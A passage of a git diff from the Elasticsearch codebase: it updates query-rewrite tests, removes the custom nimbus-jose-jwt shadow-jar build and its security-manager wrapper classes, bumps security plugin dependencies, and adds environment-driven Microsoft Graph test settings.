TWO)); + + assertEquals(Or.class, or.right().getClass()); + or = (Or) or.right(); + assertEquals(or.left(), equalsA); + assertEquals(or.right(), equalsB); + } + + public void testCombineTwoCompatiblePairsOrEqualsExpressions() throws Exception { + FieldAttribute faEquals1 = TestUtils.getFieldAttribute("field_for_equals1"); + FieldAttribute faEquals2 = TestUtils.getFieldAttribute("field_for_equals2"); + + Or firstOr = new Or(EMPTY, new Equals(EMPTY, faEquals1, ONE), new Equals(EMPTY, faEquals2, THREE)); + Or secondOr = new Or(EMPTY, firstOr, new Equals(EMPTY, faEquals1, TWO)); + Or thirdOr = new Or(EMPTY, secondOr, new Equals(EMPTY, faEquals2, FOUR)); + + Expression e = new ValidateableCombineDisjunctionsToIn().rule(thirdOr); + assertEquals(Or.class, e.getClass()); + Or or = (Or) e; + assertEquals(In.class, or.left().getClass()); + In in = (In) or.left(); + assertThat(in.list(), contains(ONE, TWO)); + + assertEquals(In.class, or.right().getClass()); + in = (In) or.right(); + assertThat(in.list(), contains(THREE, FOUR)); } // Null folding diff --git a/x-pack/plugin/rank-rrf/src/yamlRestTest/resources/rest-api-spec/test/rrf/950_pinned_interaction.yml b/x-pack/plugin/rank-rrf/src/yamlRestTest/resources/rest-api-spec/test/rrf/950_pinned_interaction.yml index e5629b7715994..bbdc7aff43b69 100644 --- a/x-pack/plugin/rank-rrf/src/yamlRestTest/resources/rest-api-spec/test/rrf/950_pinned_interaction.yml +++ b/x-pack/plugin/rank-rrf/src/yamlRestTest/resources/rest-api-spec/test/rrf/950_pinned_interaction.yml @@ -80,7 +80,7 @@ setup: - standard: query: - match: { text: "document" } + match_none: {} - pinned: ids: ["doc4", "doc5"] @@ -90,9 +90,6 @@ setup: match: { text: "document" } - match: { hits.total.value: 5 } - - match: { hits.hits.0._id: doc1 } - - lt: { hits.hits.0._score: 100.0 } - - match: { hits.hits.1._id: doc4 } - - match: { hits.hits.2._id: doc5 } - + - match: { hits.hits.0._id: doc4 } + - match: { hits.hits.1._id: doc5 } diff --git a/x-pack/plugin/search-business-rules/src/main/java/org/elasticsearch/xpack/searchbusinessrules/PinnedQueryBuilder.java b/x-pack/plugin/search-business-rules/src/main/java/org/elasticsearch/xpack/searchbusinessrules/PinnedQueryBuilder.java index 4b2d48ca1eaac..a4459811cc37d 100644 --- a/x-pack/plugin/search-business-rules/src/main/java/org/elasticsearch/xpack/searchbusinessrules/PinnedQueryBuilder.java +++ b/x-pack/plugin/search-business-rules/src/main/java/org/elasticsearch/xpack/searchbusinessrules/PinnedQueryBuilder.java @@ -14,7 +14,6 @@ import org.apache.lucene.search.Query; import org.apache.lucene.util.NumericUtils; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -288,6 +287,6 @@ protected boolean doEquals(PinnedQueryBuilder other) { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/x-pack/plugin/searchable-snapshots/src/internalClusterTest/java/org/elasticsearch/xpack/searchablesnapshots/SearchableSnapshotsCanMatchOnCoordinatorIntegTests.java b/x-pack/plugin/searchable-snapshots/src/internalClusterTest/java/org/elasticsearch/xpack/searchablesnapshots/SearchableSnapshotsCanMatchOnCoordinatorIntegTests.java index 50e58befc4a0e..2a9ae3035ae9e 100644 --- a/x-pack/plugin/searchable-snapshots/src/internalClusterTest/java/org/elasticsearch/xpack/searchablesnapshots/SearchableSnapshotsCanMatchOnCoordinatorIntegTests.java +++ b/x-pack/plugin/searchable-snapshots/src/internalClusterTest/java/org/elasticsearch/xpack/searchablesnapshots/SearchableSnapshotsCanMatchOnCoordinatorIntegTests.java @@ -1323,7 +1323,7 @@ private static IndexMetadata getIndexMetadata(String indexName) { .index(indexName); } - private void waitUntilAllShardsAreUnassigned(Index index) throws Exception { + private void waitUntilAllShardsAreUnassigned(Index index) { awaitClusterState(state -> state.getRoutingTable().index(index).allPrimaryShardsUnassigned()); } diff --git a/x-pack/plugin/searchable-snapshots/src/main/plugin-metadata/entitlement-policy.yaml b/x-pack/plugin/searchable-snapshots/src/main/plugin-metadata/entitlement-policy.yaml index 69eead6707114..d21ee299b832d 100644 --- a/x-pack/plugin/searchable-snapshots/src/main/plugin-metadata/entitlement-policy.yaml +++ b/x-pack/plugin/searchable-snapshots/src/main/plugin-metadata/entitlement-policy.yaml @@ -6,3 +6,6 @@ org.elasticsearch.searchablesnapshots: - relative_path: indices relative_to: data mode: read_write + - relative_path: "" + relative_to: shared_data + mode: read_write diff --git a/x-pack/plugin/security/build.gradle b/x-pack/plugin/security/build.gradle index 987e489fbf09f..a060404b0cff0 100644 --- a/x-pack/plugin/security/build.gradle +++ b/x-pack/plugin/security/build.gradle @@ -81,20 +81,13 @@ dependencies { // Dependencies for oidc api "com.nimbusds:oauth2-oidc-sdk:11.22.2" runtimeOnly "com.nimbusds:content-type:2.3" - api project(path: xpackModule('security:lib:nimbus-jose-jwt-modified'), configuration: 'shadow') - if (isEclipse) { - /* - * Eclipse can't pick up the shadow dependency so we point it at the unmodified version of the library - * so it can compile things. - */ - api "com.nimbusds:nimbus-jose-jwt:10.0.2" - } + api "com.nimbusds:nimbus-jose-jwt:10.0.2" api "com.nimbusds:lang-tag:1.7" - api "com.sun.mail:jakarta.mail:1.6.3" + api "com.sun.mail:jakarta.mail:1.6.8" api "net.jcip:jcip-annotations:1.0" api "net.minidev:json-smart:2.5.2" api "net.minidev:accessors-smart:2.5.2" - api "org.ow2.asm:asm:9.7.1" + api "org.ow2.asm:asm:9.8" testImplementation "org.elasticsearch:mocksocket:${versions.mocksocket}" @@ -174,9 +167,10 @@ tasks.named("processTestResources").configure { from(project(xpackModule('core')).file('src/test/resources')) } -artifacts { + +tasks.named('assemble').configure { // normal es plugins do not publish the jar but we need to since users need it for extensions - archives tasks.named("jar") + dependsOn tasks.named('jar') } tasks.named("dependencyLicenses").configure { @@ -185,6 +179,7 @@ tasks.named("dependencyLicenses").configure { mapping from: /bc.*/, to: 'bouncycastle' mapping from: /failureaccess.*/, to: 'guava' mapping from: 'content-type', to: 'nimbus' + mapping from: /nimbus.*/, to: 'nimbus' } tasks.named("forbiddenPatterns").configure { @@ -387,6 +382,16 @@ tasks.named("thirdPartyAudit").configure { 'org.bouncycastle.util.Arrays', 'org.bouncycastle.util.io.Streams', 'org.bouncycastle.cert.X509CertificateHolder', + // missing classes linked by nimbus + 'com.google.crypto.tink.subtle.Ed25519Sign', + 'com.google.crypto.tink.subtle.Ed25519Sign$KeyPair', + 'com.google.crypto.tink.subtle.Ed25519Verify', + 'com.google.crypto.tink.subtle.X25519', + 'com.google.crypto.tink.subtle.XChaCha20Poly1305', + 'org.bouncycastle.cert.jcajce.JcaX509CertificateHolder', + 'org.bouncycastle.openssl.PEMKeyPair', + 'org.bouncycastle.openssl.PEMParser', + 'org.bouncycastle.openssl.jcajce.JcaPEMKeyConverter' ) ignoreViolations( diff --git a/x-pack/plugin/security/lib/build.gradle b/x-pack/plugin/security/lib/build.gradle deleted file mode 100644 index 7bc94f348e781..0000000000000 --- a/x-pack/plugin/security/lib/build.gradle +++ /dev/null @@ -1,13 +0,0 @@ -// This build deserves an explanation. Nimbus-jose-jwt uses gson internally, which is unfriendly -// to our usage of the security manager, to a degree that it makes the library extremely difficult -// to work with safely. The purpose of this build is to create a version of nimbus-jose-jwt with -// a couple classes replaced with wrappers which work with the security manager, the source files -// in this directory. - -// Because we want to include the original class files so that we can reference them without -// modification, there are a couple intermediate steps: -// nimbus-jose-jwt-modified-part1: Create a version of the JAR in which the relevant class files are moved to a different package. -// This is not immediately usable as this process rewrites the rest of the JAR to "correctly" reference the new classes. So, we need to... -// nimbus-jose-jwt-modified-part2: Create a JAR from the result of part 1 which contains *only* the relevant class files by removing everything else. -// nimbus-jose-jwt-modified: Use the result of part 2 here, combined with the original library, so that we can use our -// replacement classes which wrap the original class files. diff --git a/x-pack/plugin/security/lib/nimbus-jose-jwt-modified-part1/build.gradle b/x-pack/plugin/security/lib/nimbus-jose-jwt-modified-part1/build.gradle deleted file mode 100644 index 4855a9286a7eb..0000000000000 --- a/x-pack/plugin/security/lib/nimbus-jose-jwt-modified-part1/build.gradle +++ /dev/null @@ -1,29 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. - */ - -apply plugin: 'elasticsearch.build' -apply plugin: 'com.gradleup.shadow' - -// See the build.gradle file in the parent directory for an explanation of this unusual build - -dependencies { - implementation "com.nimbusds:nimbus-jose-jwt:10.0.2" -} - -tasks.named('shadowJar').configure { - // Attempting to exclude all of the classes we *don't* move here ought to be possible per the - // shadowJar docs, but actually attempting to do so results in an empty JAR. May be a bug in the shadowJar plugin. - relocate 'com.nimbusds.jose.util.JSONObjectUtils', 'org.elasticsearch.nimbus.jose.util.JSONObjectUtils' - relocate 'com.nimbusds.jose.util.JSONStringUtils', 'org.elasticsearch.nimbus.jose.util.JSONStringUtils' -} - -['jarHell', 'thirdPartyAudit', 'forbiddenApisMain', 'splitPackagesAudit', 'licenseHeaders'].each { - tasks.named(it).configure { - enabled = false - } -} - diff --git a/x-pack/plugin/security/lib/nimbus-jose-jwt-modified-part1/licenses/nimbus-jose-jwt-LICENSE.txt b/x-pack/plugin/security/lib/nimbus-jose-jwt-modified-part1/licenses/nimbus-jose-jwt-LICENSE.txt deleted file mode 100644 index d645695673349..0000000000000 --- a/x-pack/plugin/security/lib/nimbus-jose-jwt-modified-part1/licenses/nimbus-jose-jwt-LICENSE.txt +++ /dev/null @@ -1,202 +0,0 @@ - - Apache License - Version 2.0, January 2004 - http://www.apache.org/licenses/ - - TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION - - 1. Definitions. - - "License" shall mean the terms and conditions for use, reproduction, - and distribution as defined by Sections 1 through 9 of this document. - - "Licensor" shall mean the copyright owner or entity authorized by - the copyright owner that is granting the License. - - "Legal Entity" shall mean the union of the acting entity and all - other entities that control, are controlled by, or are under common - control with that entity. For the purposes of this definition, - "control" means (i) the power, direct or indirect, to cause the - direction or management of such entity, whether by contract or - otherwise, or (ii) ownership of fifty percent (50%) or more of the - outstanding shares, or (iii) beneficial ownership of such entity. - - "You" (or "Your") shall mean an individual or Legal Entity - exercising permissions granted by this License. - - "Source" form shall mean the preferred form for making modifications, - including but not limited to software source code, documentation - source, and configuration files. - - "Object" form shall mean any form resulting from mechanical - transformation or translation of a Source form, including but - not limited to compiled object code, generated documentation, - and conversions to other media types. - - "Work" shall mean the work of authorship, whether in Source or - Object form, made available under the License, as indicated by a - copyright notice that is included in or attached to the work - (an example is provided in the Appendix below). - - "Derivative Works" shall mean any work, whether in Source or Object - form, that is based on (or derived from) the Work and for which the - editorial revisions, annotations, elaborations, or other modifications - represent, as a whole, an original work of authorship. For the purposes - of this License, Derivative Works shall not include works that remain - separable from, or merely link (or bind by name) to the interfaces of, - the Work and Derivative Works thereof. - - "Contribution" shall mean any work of authorship, including - the original version of the Work and any modifications or additions - to that Work or Derivative Works thereof, that is intentionally - submitted to Licensor for inclusion in the Work by the copyright owner - or by an individual or Legal Entity authorized to submit on behalf of - the copyright owner. For the purposes of this definition, "submitted" - means any form of electronic, verbal, or written communication sent - to the Licensor or its representatives, including but not limited to - communication on electronic mailing lists, source code control systems, - and issue tracking systems that are managed by, or on behalf of, the - Licensor for the purpose of discussing and improving the Work, but - excluding communication that is conspicuously marked or otherwise - designated in writing by the copyright owner as "Not a Contribution." - - "Contributor" shall mean Licensor and any individual or Legal Entity - on behalf of whom a Contribution has been received by Licensor and - subsequently incorporated within the Work. - - 2. Grant of Copyright License. Subject to the terms and conditions of - this License, each Contributor hereby grants to You a perpetual, - worldwide, non-exclusive, no-charge, royalty-free, irrevocable - copyright license to reproduce, prepare Derivative Works of, - publicly display, publicly perform, sublicense, and distribute the - Work and such Derivative Works in Source or Object form. - - 3. Grant of Patent License. Subject to the terms and conditions of - this License, each Contributor hereby grants to You a perpetual, - worldwide, non-exclusive, no-charge, royalty-free, irrevocable - (except as stated in this section) patent license to make, have made, - use, offer to sell, sell, import, and otherwise transfer the Work, - where such license applies only to those patent claims licensable - by such Contributor that are necessarily infringed by their - Contribution(s) alone or by combination of their Contribution(s) - with the Work to which such Contribution(s) was submitted. If You - institute patent litigation against any entity (including a - cross-claim or counterclaim in a lawsuit) alleging that the Work - or a Contribution incorporated within the Work constitutes direct - or contributory patent infringement, then any patent licenses - granted to You under this License for that Work shall terminate - as of the date such litigation is filed. - - 4. Redistribution. You may reproduce and distribute copies of the - Work or Derivative Works thereof in any medium, with or without - modifications, and in Source or Object form, provided that You - meet the following conditions: - - (a) You must give any other recipients of the Work or - Derivative Works a copy of this License; and - - (b) You must cause any modified files to carry prominent notices - stating that You changed the files; and - - (c) You must retain, in the Source form of any Derivative Works - that You distribute, all copyright, patent, trademark, and - attribution notices from the Source form of the Work, - excluding those notices that do not pertain to any part of - the Derivative Works; and - - (d) If the Work includes a "NOTICE" text file as part of its - distribution, then any Derivative Works that You distribute must - include a readable copy of the attribution notices contained - within such NOTICE file, excluding those notices that do not - pertain to any part of the Derivative Works, in at least one - of the following places: within a NOTICE text file distributed - as part of the Derivative Works; within the Source form or - documentation, if provided along with the Derivative Works; or, - within a display generated by the Derivative Works, if and - wherever such third-party notices normally appear. The contents - of the NOTICE file are for informational purposes only and - do not modify the License. You may add Your own attribution - notices within Derivative Works that You distribute, alongside - or as an addendum to the NOTICE text from the Work, provided - that such additional attribution notices cannot be construed - as modifying the License. - - You may add Your own copyright statement to Your modifications and - may provide additional or different license terms and conditions - for use, reproduction, or distribution of Your modifications, or - for any such Derivative Works as a whole, provided Your use, - reproduction, and distribution of the Work otherwise complies with - the conditions stated in this License. - - 5. Submission of Contributions. Unless You explicitly state otherwise, - any Contribution intentionally submitted for inclusion in the Work - by You to the Licensor shall be under the terms and conditions of - this License, without any additional terms or conditions. - Notwithstanding the above, nothing herein shall supersede or modify - the terms of any separate license agreement you may have executed - with Licensor regarding such Contributions. - - 6. Trademarks. This License does not grant permission to use the trade - names, trademarks, service marks, or product names of the Licensor, - except as required for reasonable and customary use in describing the - origin of the Work and reproducing the content of the NOTICE file. - - 7. Disclaimer of Warranty. Unless required by applicable law or - agreed to in writing, Licensor provides the Work (and each - Contributor provides its Contributions) on an "AS IS" BASIS, - WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or - implied, including, without limitation, any warranties or conditions - of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A - PARTICULAR PURPOSE. You are solely responsible for determining the - appropriateness of using or redistributing the Work and assume any - risks associated with Your exercise of permissions under this License. - - 8. Limitation of Liability. In no event and under no legal theory, - whether in tort (including negligence), contract, or otherwise, - unless required by applicable law (such as deliberate and grossly - negligent acts) or agreed to in writing, shall any Contributor be - liable to You for damages, including any direct, indirect, special, - incidental, or consequential damages of any character arising as a - result of this License or out of the use or inability to use the - Work (including but not limited to damages for loss of goodwill, - work stoppage, computer failure or malfunction, or any and all - other commercial damages or losses), even if such Contributor - has been advised of the possibility of such damages. - - 9. Accepting Warranty or Additional Liability. While redistributing - the Work or Derivative Works thereof, You may choose to offer, - and charge a fee for, acceptance of support, warranty, indemnity, - or other liability obligations and/or rights consistent with this - License. However, in accepting such obligations, You may act only - on Your own behalf and on Your sole responsibility, not on behalf - of any other Contributor, and only if You agree to indemnify, - defend, and hold each Contributor harmless for any liability - incurred by, or claims asserted against, such Contributor by reason - of your accepting any such warranty or additional liability. - - END OF TERMS AND CONDITIONS - - APPENDIX: How to apply the Apache License to your work. - - To apply the Apache License to your work, attach the following - boilerplate notice, with the fields enclosed by brackets "[]" - replaced with your own identifying information. (Don't include - the brackets!) The text should be enclosed in the appropriate - comment syntax for the file format. We also recommend that a - file or class name and description of purpose be included on the - same "printed page" as the copyright notice for easier - identification within third-party archives. - - Copyright [yyyy] [name of copyright owner] - - Licensed under the Apache License, Version 2.0 (the "License"); - you may not use this file except in compliance with the License. - You may obtain a copy of the License at - - http://www.apache.org/licenses/LICENSE-2.0 - - Unless required by applicable law or agreed to in writing, software - distributed under the License is distributed on an "AS IS" BASIS, - WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - See the License for the specific language governing permissions and - limitations under the License. diff --git a/x-pack/plugin/security/lib/nimbus-jose-jwt-modified-part1/licenses/nimbus-jose-jwt-NOTICE.txt b/x-pack/plugin/security/lib/nimbus-jose-jwt-modified-part1/licenses/nimbus-jose-jwt-NOTICE.txt deleted file mode 100644 index cb9ad94f662a6..0000000000000 --- a/x-pack/plugin/security/lib/nimbus-jose-jwt-modified-part1/licenses/nimbus-jose-jwt-NOTICE.txt +++ /dev/null @@ -1,14 +0,0 @@ -Nimbus JOSE + JWT - -Copyright 2012 - 2018, Connect2id Ltd. - -Licensed under the Apache License, Version 2.0 (the "License"); you may not use -this file except in compliance with the License. You may obtain a copy of the -License at - - http://www.apache.org/licenses/LICENSE-2.0 - -Unless required by applicable law or agreed to in writing, software distributed -under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR -CONDITIONS OF ANY KIND, either express or implied. See the License for the -specific language governing permissions and limitations under the License. diff --git a/x-pack/plugin/security/lib/nimbus-jose-jwt-modified-part2/build.gradle b/x-pack/plugin/security/lib/nimbus-jose-jwt-modified-part2/build.gradle deleted file mode 100644 index d24299a3847da..0000000000000 --- a/x-pack/plugin/security/lib/nimbus-jose-jwt-modified-part2/build.gradle +++ /dev/null @@ -1,26 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. - */ - -apply plugin: 'elasticsearch.build' -apply plugin: 'com.gradleup.shadow' - -// See the build.gradle file in the parent directory for an explanation of this unusual build - -dependencies { - implementation project(path: xpackModule('security:lib:nimbus-jose-jwt-modified-part1'), configuration: 'shadow') -} - -tasks.named('shadowJar').configure { - // Drop everything in the original namespace, as the classes we want to modify have already been moved to another package by part 1 - exclude 'com/nimbusds/' -} - -['jarHell', 'thirdPartyAudit', 'forbiddenApisMain', 'splitPackagesAudit', 'licenseHeaders'].each { - tasks.named(it).configure { - enabled = false - } -} diff --git a/x-pack/plugin/security/lib/nimbus-jose-jwt-modified/build.gradle b/x-pack/plugin/security/lib/nimbus-jose-jwt-modified/build.gradle deleted file mode 100644 index d83788891845d..0000000000000 --- a/x-pack/plugin/security/lib/nimbus-jose-jwt-modified/build.gradle +++ /dev/null @@ -1,29 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. - */ - -apply plugin: 'elasticsearch.build' -apply plugin: 'com.gradleup.shadow' - -// See the build.gradle file in the parent directory for an explanation of this unusual build - -dependencies { - implementation "com.nimbusds:nimbus-jose-jwt:10.0.2" - implementation project(path: xpackModule('security:lib:nimbus-jose-jwt-modified-part2'), configuration: 'shadow') -} - -tasks.named('shadowJar').configure { - manifest { - // The original library uses this and it gets stripped by shadowJar - attributes 'Automatic-Module-Name': 'com.nimbusds.jose.jwt' - } -} - -['jarHell', 'thirdPartyAudit', 'forbiddenApisMain', 'splitPackagesAudit', 'licenseHeaders'].each { - tasks.named(it).configure { - enabled = false - } -} diff --git a/x-pack/plugin/security/lib/nimbus-jose-jwt-modified/licenses/nimbus-jose-jwt-NOTICE.txt b/x-pack/plugin/security/lib/nimbus-jose-jwt-modified/licenses/nimbus-jose-jwt-NOTICE.txt deleted file mode 100644 index cb9ad94f662a6..0000000000000 --- a/x-pack/plugin/security/lib/nimbus-jose-jwt-modified/licenses/nimbus-jose-jwt-NOTICE.txt +++ /dev/null @@ -1,14 +0,0 @@ -Nimbus JOSE + JWT - -Copyright 2012 - 2018, Connect2id Ltd. - -Licensed under the Apache License, Version 2.0 (the "License"); you may not use -this file except in compliance with the License. You may obtain a copy of the -License at - - http://www.apache.org/licenses/LICENSE-2.0 - -Unless required by applicable law or agreed to in writing, software distributed -under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR -CONDITIONS OF ANY KIND, either express or implied. See the License for the -specific language governing permissions and limitations under the License. diff --git a/x-pack/plugin/security/lib/nimbus-jose-jwt-modified/src/main/java/com/nimbusds/jose/util/JSONObjectUtils.java b/x-pack/plugin/security/lib/nimbus-jose-jwt-modified/src/main/java/com/nimbusds/jose/util/JSONObjectUtils.java deleted file mode 100644 index 34b61e612c747..0000000000000 --- a/x-pack/plugin/security/lib/nimbus-jose-jwt-modified/src/main/java/com/nimbusds/jose/util/JSONObjectUtils.java +++ /dev/null @@ -1,219 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. - */ - -package com.nimbusds.jose.util; - -import java.net.URI; -import java.security.AccessController; -import java.security.PrivilegedAction; -import java.security.PrivilegedActionException; -import java.security.PrivilegedExceptionAction; -import java.text.ParseException; -import java.util.Date; -import java.util.List; -import java.util.Map; - -/** - * This class wraps {@link org.elasticsearch.nimbus.jose.util.JSONObjectUtils}, which is copied directly from the source - * library, and delegates to that class as quickly as possible. This layer is only here to provide a point at which we - * can insert {@link java.security.AccessController#doPrivileged(PrivilegedAction)} calls as necessary. We don't do - * anything here other than ensure gson has the proper security manager permissions. - */ -public class JSONObjectUtils { - - public static Map parse(final String s) throws ParseException { - try { - return AccessController.doPrivileged( - (PrivilegedExceptionAction>) () -> org.elasticsearch.nimbus.jose.util.JSONObjectUtils.parse(s) - ); - } catch (PrivilegedActionException e) { - throw (ParseException) e.getException(); - } - } - - public static Map parse(final String s, final int sizeLimit) throws ParseException { - try { - return AccessController.doPrivileged( - (PrivilegedExceptionAction>) () -> org.elasticsearch.nimbus.jose.util.JSONObjectUtils.parse( - s, - sizeLimit - ) - ); - } catch (PrivilegedActionException e) { - throw (ParseException) e.getException(); - } - } - - @Deprecated - public static Map parseJSONObject(final String s) throws ParseException { - try { - return AccessController.doPrivileged( - (PrivilegedExceptionAction>) () -> org.elasticsearch.nimbus.jose.util.JSONObjectUtils.parseJSONObject(s) - ); - } catch (PrivilegedActionException e) { - throw (ParseException) e.getException(); - } - } - - public static boolean getBoolean(final Map o, final String key) throws ParseException { - try { - return AccessController.doPrivileged( - (PrivilegedExceptionAction) () -> org.elasticsearch.nimbus.jose.util.JSONObjectUtils.getBoolean(o, key) - ); - } catch (PrivilegedActionException e) { - throw (ParseException) e.getException(); - } - } - - public static int getInt(final Map o, final String key) throws ParseException { - try { - return AccessController.doPrivileged( - (PrivilegedExceptionAction) () -> org.elasticsearch.nimbus.jose.util.JSONObjectUtils.getInt(o, key) - ); - } catch (PrivilegedActionException e) { - throw (ParseException) e.getException(); - } - } - - public static long getLong(final Map o, final String key) throws ParseException { - try { - return AccessController.doPrivileged( - (PrivilegedExceptionAction) () -> org.elasticsearch.nimbus.jose.util.JSONObjectUtils.getLong(o, key) - ); - } catch (PrivilegedActionException e) { - throw (ParseException) e.getException(); - } - } - - public static float getFloat(final Map o, final String key) throws ParseException { - try { - return AccessController.doPrivileged( - (PrivilegedExceptionAction) () -> org.elasticsearch.nimbus.jose.util.JSONObjectUtils.getFloat(o, key) - ); - } catch (PrivilegedActionException e) { - throw (ParseException) e.getException(); - } - } - - public static double getDouble(final Map o, final String key) throws ParseException { - try { - return AccessController.doPrivileged( - (PrivilegedExceptionAction) () -> org.elasticsearch.nimbus.jose.util.JSONObjectUtils.getDouble(o, key) - ); - } catch (PrivilegedActionException e) { - throw (ParseException) e.getException(); - } - } - - public static String getString(final Map o, final String key) throws ParseException { - try { - return AccessController.doPrivileged( - (PrivilegedExceptionAction) () -> org.elasticsearch.nimbus.jose.util.JSONObjectUtils.getString(o, key) - ); - } catch (PrivilegedActionException e) { - throw (ParseException) e.getException(); - } - } - - public static URI getURI(final Map o, final String key) throws ParseException { - try { - return AccessController.doPrivileged( - (PrivilegedExceptionAction) () -> org.elasticsearch.nimbus.jose.util.JSONObjectUtils.getURI(o, key) - ); - } catch (PrivilegedActionException e) { - throw (ParseException) e.getException(); - } - } - - public static List getJSONArray(final Map o, final String key) throws ParseException { - try { - return AccessController.doPrivileged( - (PrivilegedExceptionAction>) () -> org.elasticsearch.nimbus.jose.util.JSONObjectUtils.getJSONArray(o, key) - ); - } catch (PrivilegedActionException e) { - throw (ParseException) e.getException(); - } - } - - public static String[] getStringArray(final Map o, final String key) throws ParseException { - try { - return AccessController.doPrivileged( - (PrivilegedExceptionAction) () -> org.elasticsearch.nimbus.jose.util.JSONObjectUtils.getStringArray(o, key) - ); - } catch (PrivilegedActionException e) { - throw (ParseException) e.getException(); - } - } - - public static Map[] getJSONObjectArray(final Map o, final String key) throws ParseException { - try { - return AccessController.doPrivileged( - (PrivilegedExceptionAction[]>) () -> org.elasticsearch.nimbus.jose.util.JSONObjectUtils - .getJSONObjectArray(o, key) - ); - } catch (PrivilegedActionException e) { - throw (ParseException) e.getException(); - } - } - - public static List getStringList(final Map o, final String key) throws ParseException { - try { - return AccessController.doPrivileged( - (PrivilegedExceptionAction>) () -> org.elasticsearch.nimbus.jose.util.JSONObjectUtils.getStringList(o, key) - ); - } catch (PrivilegedActionException e) { - throw (ParseException) e.getException(); - } - } - - public static Map getJSONObject(final Map o, final String key) throws ParseException { - try { - return AccessController.doPrivileged( - (PrivilegedExceptionAction>) () -> org.elasticsearch.nimbus.jose.util.JSONObjectUtils.getJSONObject( - o, - key - ) - ); - } catch (PrivilegedActionException e) { - throw (ParseException) e.getException(); - } - } - - public static Base64URL getBase64URL(final Map o, final String key) throws ParseException { - try { - return AccessController.doPrivileged( - (PrivilegedExceptionAction) () -> org.elasticsearch.nimbus.jose.util.JSONObjectUtils.getBase64URL(o, key) - ); - } catch (PrivilegedActionException e) { - throw (ParseException) e.getException(); - } - } - - public static Date getEpochSecondAsDate(final Map o, final String key) throws ParseException { - try { - return AccessController.doPrivileged( - (PrivilegedExceptionAction) () -> org.elasticsearch.nimbus.jose.util.JSONObjectUtils.getEpochSecondAsDate(o, key) - ); - } catch (PrivilegedActionException e) { - throw (ParseException) e.getException(); - } - } - - public static String toJSONString(final Map o) { - return AccessController.doPrivileged( - (PrivilegedAction) () -> org.elasticsearch.nimbus.jose.util.JSONObjectUtils.toJSONString(o) - ); - } - - public static Map newJSONObject() { - return AccessController.doPrivileged( - (PrivilegedAction>) org.elasticsearch.nimbus.jose.util.JSONObjectUtils::newJSONObject - ); - } - - private JSONObjectUtils() {} -} diff --git a/x-pack/plugin/security/lib/nimbus-jose-jwt-modified/src/main/java/com/nimbusds/jose/util/JSONStringUtils.java b/x-pack/plugin/security/lib/nimbus-jose-jwt-modified/src/main/java/com/nimbusds/jose/util/JSONStringUtils.java deleted file mode 100644 index e9e34d21ce7d6..0000000000000 --- a/x-pack/plugin/security/lib/nimbus-jose-jwt-modified/src/main/java/com/nimbusds/jose/util/JSONStringUtils.java +++ /dev/null @@ -1,26 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. - */ - -package com.nimbusds.jose.util; - -import java.security.AccessController; -import java.security.PrivilegedAction; - -/** - * This class wraps {@link JSONStringUtils}, which is copied directly from the source library, and delegates to - * that class as quickly as possible. This layer is only here to provide a point at which we can insert - * {@link java.security.AccessController#doPrivileged(PrivilegedAction)} calls as necessary. We don't do anything here - * other than ensure gson has the proper security manager permissions. - */ -public class JSONStringUtils { - - public static String toJSONString(final String string) { - return AccessController.doPrivileged((PrivilegedAction) () -> JSONStringUtils.toJSONString(string)); - } - - private JSONStringUtils() {} -} diff --git a/x-pack/plugin/security/qa/microsoft-graph-authz-tests/build.gradle b/x-pack/plugin/security/qa/microsoft-graph-authz-tests/build.gradle index f949902c68079..1fd93d730f54f 100644 --- a/x-pack/plugin/security/qa/microsoft-graph-authz-tests/build.gradle +++ b/x-pack/plugin/security/qa/microsoft-graph-authz-tests/build.gradle @@ -8,7 +8,34 @@ dependencies { clusterModules project(":modules:analysis-common") } +boolean useFixture = false +String msGraphTenantId = System.getenv("ms_graph_tenant_id") +String msGraphClientId = System.getenv("ms_graph_client_id") +String msGraphClientSecret = System.getenv("ms_graph_client_secret") +String msGraphUsername = System.getenv("ms_graph_username") +String msGraphGroupId = System.getenv("ms_graph_group_id") + +if (!msGraphTenantId || !msGraphClientId || !msGraphClientSecret || !msGraphUsername || !msGraphGroupId) { + msGraphTenantId = "tenant-id" + msGraphClientId = "client_id" + msGraphClientSecret = "client_secret" + msGraphUsername = "Thor" + msGraphGroupId = "test_group" + useFixture = true +} + tasks.named("javaRestTest").configure { + systemProperty "test.ms_graph.fixture", useFixture + systemProperty "test.ms_graph.tenant_id", msGraphTenantId + systemProperty "test.ms_graph.client_id", msGraphClientId + systemProperty "test.ms_graph.client_secret", msGraphClientSecret + systemProperty "test.ms_graph.username", msGraphUsername + systemProperty "test.ms_graph.group_id", msGraphGroupId + // disable tests in FIPS mode as we need to use a custom truststore containing the certs used in MicrosoftGraphHttpFixture buildParams.withFipsEnabledOnly(it) } + +tasks.register("msGraphThirdPartyTest") { + dependsOn "javaRestTest" +} diff --git 